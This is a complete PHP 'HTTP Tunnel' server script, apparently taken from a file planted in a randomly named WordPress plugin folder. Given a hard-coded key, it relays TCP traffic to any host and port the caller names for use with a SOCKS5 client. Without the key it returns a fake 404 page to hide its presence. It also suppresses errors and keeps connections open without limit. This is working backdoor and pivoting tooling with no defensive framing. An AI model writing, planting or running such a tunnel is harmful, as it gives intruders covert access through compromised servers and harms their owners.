File: //proc/thread-self/root/proc/self/root/proc/thread-self/cwd/wp-content/plugins/hgzvgtw/man.php
<?php
/**
* HTTP Tunnel — server side
*
* Upload to your PHP server. Works without exec(), without persistent
* processes, without binding to ports. Every request is short-lived.
*
* Architecture:
* cmd=connect : opens TCP to target, streams data back via HTTP response
* (this is the only long-ish request — stays open while
* the tunnel is active, but keeps sending HTTP data
* so the web server sees it as "actively serving")
* cmd=send : short POST, writes data into a temp file that the
* connect loop picks up and forwards to the target
* cmd=disconnect : signals the connect loop to exit
* cmd=ping : health check
*
* Pair with tunnel_client.py which provides a local SOCKS5 interface.
*/
// ============================================================
// CONFIGURATION — change this key before deploying
// ============================================================
define('TUNNEL_KEY', 'fn9u24g9unfv87gefojinhf');
// ============================================================
define('SESSION_DIR', __DIR__ . '/.tun');
error_reporting(0);
$key = $_GET['k'] ?? $_POST['k'] ?? '';
if ($key !== TUNNEL_KEY) {
http_response_code(404);
echo '<!DOCTYPE html><html><head><title>404</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>';
exit;
}
$cmd = $_GET['cmd'] ?? '';
$session = preg_replace('/[^a-zA-Z0-9]/', '', $_GET['s'] ?? '');
if (!is_dir(SESSION_DIR)) @mkdir(SESSION_DIR, 0700, true);
switch ($cmd) {
case 'connect': tunConnect(); break;
case 'send': tunSend(); break;
case 'disconnect': tunDisconnect(); break;
case 'ping': header('Content-Type: text/plain'); echo 'pong'; break;
default: http_response_code(404); echo 'not found'; break;
}
exit;
// ============================================================
// CONNECT — long-lived request that holds the TCP connection
// ============================================================
function tunConnect() {
global $session;
$target = $_GET['target'] ?? '';
if (!$session || !$target) { http_response_code(400); die('bad params'); }
ignore_user_abort(true);
set_time_limit(0);
@session_write_close();
@list($host, $port) = explode(':', $target, 2);
$port = intval($port);
if (!$host || $port < 1) { http_response_code(400); die('bad target'); }
$sock = @stream_socket_client("tcp://$host:$port", $errno, $errstr, 15);
if (!$sock) {
http_response_code(502);
die("tcp_fail:$errstr");
}
stream_set_blocking($sock, false);
$inboxFile = SESSION_DIR . "/{$session}.in";
$metaFile = SESSION_DIR . "/{$session}.meta";
file_put_contents($inboxFile, '');
file_put_contents($metaFile, getmypid());
$initData = file_get_contents('php://input');
if ($initData !== '' && $initData !== false) {
@fwrite($sock, $initData);
}
// Prepare streaming response — disable every buffer layer
@ini_set('zlib.output_compression', 'Off');
@ini_set('output_buffering', 'Off');
@ini_set('implicit_flush', 1);
if (function_exists('apache_setenv')) @apache_setenv('no-gzip', '1');
while (ob_get_level()) ob_end_clean();
ob_implicit_flush(1);
header('Content-Type: application/octet-stream');
header('X-Accel-Buffering: no');
header('Cache-Control: no-cache, no-store');
header('Content-Encoding: none');
// Frame: 4-byte big-endian length + data. Length 0 = keepalive.
sendFrame("\x00"); // status: connected OK
$lastKA = time();
while (true) {
// Wait for data on the target socket (up to 50ms)
$r = [$sock]; $w = $e = null;
@stream_select($r, $w, $e, 0, 50000);
if ($r) {
$data = @fread($sock, 65536);
if ($data !== '' && $data !== false) {
sendFrame($data);
$lastKA = time();
}
}
if (@feof($sock)) break;
// Forward queued client data from the inbox file
clearstatcache(true, $inboxFile);
if (file_exists($inboxFile) && @filesize($inboxFile) > 0) {
$fh = @fopen($inboxFile, 'c+');
if ($fh && flock($fh, LOCK_EX | LOCK_NB)) {
$queued = stream_get_contents($fh);
ftruncate($fh, 0);
rewind($fh);
flock($fh, LOCK_UN);
fclose($fh);
if ($queued !== '' && $queued !== false) {
@fwrite($sock, $queued);
}
} else {
if ($fh) fclose($fh);
}
}
// Stop signal
if (!file_exists($metaFile)) break;
// Keepalive every 20s to prevent web server / proxy timeout
if (time() - $lastKA >= 20) {
sendFrame('');
$lastKA = time();
}
// Check if the HTTP connection is still alive
if (connection_aborted()) break;
}
@fclose($sock);
@unlink($inboxFile);
@unlink($metaFile);
}
// ============================================================
// SEND — short request, queues data for the connect loop
// ============================================================
function tunSend() {
global $session;
if (!$session) { http_response_code(400); die('no session'); }
$inboxFile = SESSION_DIR . "/{$session}.in";
$data = file_get_contents('php://input');
if ($data !== '' && $data !== false) {
$fh = @fopen($inboxFile, 'a');
if ($fh) {
flock($fh, LOCK_EX);
fwrite($fh, $data);
flock($fh, LOCK_UN);
fclose($fh);
}
}
header('Content-Type: text/plain');
echo 'ok';
}
// ============================================================
// DISCONNECT — signals the connect loop to stop
// ============================================================
function tunDisconnect() {
global $session;
if (!$session) { http_response_code(400); die('no session'); }
@unlink(SESSION_DIR . "/{$session}.meta");
@unlink(SESSION_DIR . "/{$session}.in");
header('Content-Type: text/plain');
echo 'ok';
}
// ============================================================
function sendFrame($data) {
$frame = pack('N', strlen($data)) . $data;
echo $frame;
flush();
}